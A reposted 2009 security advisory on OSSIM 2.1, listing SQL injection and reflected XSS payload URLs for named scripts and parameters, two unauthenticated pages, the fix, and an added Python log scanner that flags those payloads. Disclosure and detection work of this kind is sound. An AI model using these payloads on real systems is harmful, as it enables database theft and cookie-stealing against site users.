OSSIM 2.1 - Multiple security vulnerabilities
Published: 2019-05-10


OSSIM (Open Source Security Information Management) is affected by multiple security vulnerabilities:

1. SQL Injections
2. Linked XSS
3. Unauthorized access

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055
Application: OSSIM
Versions Affected: 2.1 and possibly 2.1.1
Vendor URL: http://ossim.net/
Bug: SQL Injection, XSS, Unauthorized access
Exploits: YES
Reported: 07.09.2009
Vendor response: 09.09.2009
Solution: YES (version 2.1.2)
Date of Public Advisory: 21.09.2009
Author: Sintsov Alexey of Digital Security Research Group [DSecRG]

Details
*******
1.1 SQL injections in repository
The attacker must be authorized in the system for the attack to succeed.
Vulnerable script - repository_document.php
Vulnerable parameter - id_document
Example
*******
http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3 union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1

1.2 SQL injections in repository
The attacker must be authorized in the system for the attack to succeed.
Vulnerable script - repository_links.php
Vulnerable parameter - id_document
Example
*******
http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3 union select 1,user(),3,4,5,6

1.3 SQL injections in repository
The attacker must be authorized in the system for the attack to succeed.
Vulnerable script - repository_editdocument.php
Vulnerable parameter - id_document
Example
*******
http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3 union select 1,user(),3,4,5,6

1.4 SQL injection in policy scripts
The attacker must be authorized in the system for the attack to succeed.
Vulnerable script - getpolicy.php
Vulnerable parameter - group
Example
*******
http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1

1.5 SQL injection in policy scripts
The attacker must be authorized in the system for the attack to succeed.
Vulnerable script - newhostgroupform.php
Vulnerable parameter - name
Example
*******
http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select user(),'b','c','d','f

1.6 SQL injection in policy scripts
The attacker must be authorized in the system for the attack to succeed.
Vulnerable script - modifynetform.php
Vulnerable parameter - name
Example
*******
http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select user(),'b','c','d','e','f','g','h','a
Other scripts in the policy menu are also affected.

2. Linked XSS in main menu
Vulnerable script - /ossim/
Vulnerable parameter - option
Example
*******
http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a="
3. Access to data without authentication.
An unauthorized user can view graphs and the internal infrastructure.
Example
*******
Access to the graph:
http://OSSIM-SERVER/ossim/graphs/alarms_events.php
Internal infrastructure view:
http://OSSIM-SERVER/ossim/host/draw_tree.php
Fix Information
***************
Upgrade to version 2.1.2
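
For installations that ran an affected version, web server access logs can be reviewed for requests that hit the scripts and parameters listed above with unexpected values. The following is an added example, not part of the DSecRG advisory or of OSSIM: the value rules (ids and menu options are integers, names contain no quote characters), the Combined Log Format input and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths and parameter names come from the advisory. The value rules are
# assumptions: ids and menu options are integers, names never contain quotes.
RULES = {
    "/ossim/repository/repository_document.php": ("id_document", "int"),
    "/ossim/repository/repository_links.php": ("id_document", "int"),
    "/ossim/repository/repository_editdocument.php": ("id_document", "int"),
    "/ossim/policy/getpolicy.php": ("group", "int"),
    "/ossim/host/newhostgroupform.php": ("name", "noquote"),
    "/ossim/net/modifynetform.php": ("name", "noquote"),
    "/ossim/": ("option", "int"),
}
INT = re.compile(r"-?\d+")
# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious(line):
    """Return (path, param, decoded value) if a rule is broken, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path not in RULES:
        return None
    param, kind = RULES[url.path]
    for key, value in parse_qsl(url.query):  # percent-decodes the values
        if key != param:
            continue
        if kind == "int" and not INT.fullmatch(value.strip()):
            return (url.path, param, value)
        if kind == "noquote" and ("'" in value or '"' in value):
            return (url.path, param, value)
    return None

def scan(lines):
    return [hit for hit in map(suspicious, lines) if hit]

SAMPLE_LOG = [  # constructed lines, documentation address range
    '192.0.2.10 - - [21/Sep/2009:10:00:01 +0000] "GET /ossim/repository/repository_document.php?id_document=12&maximized=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [21/Sep/2009:10:00:07 +0000] "GET /ossim/repository/repository_document.php?id_document=-3%20union%20select%201,2,user(),4,5,6--&maximized=1 HTTP/1.1" 200 4980',
    '192.0.2.44 - - [21/Sep/2009:10:00:09 +0000] "GET /ossim/policy/getpolicy.php?group=0%20and%201=1 HTTP/1.1" 200 731',
    '192.0.2.10 - - [21/Sep/2009:10:00:15 +0000] "GET /ossim/?option=2 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for path, param, value in scan(SAMPLE_LOG):
        print(f"ALERT {path} {param}={value!r}")
```

Only query-string parameters appear in access logs, so values sent in POST bodies are not covered by this check.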
References
**********
http://www.alienvault.com/community.php?section=News
http://dsecrg.com/pages/vul/show.php?id=155
About
*****
Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

Reposted from: http://igmmb.baihongyu.com/
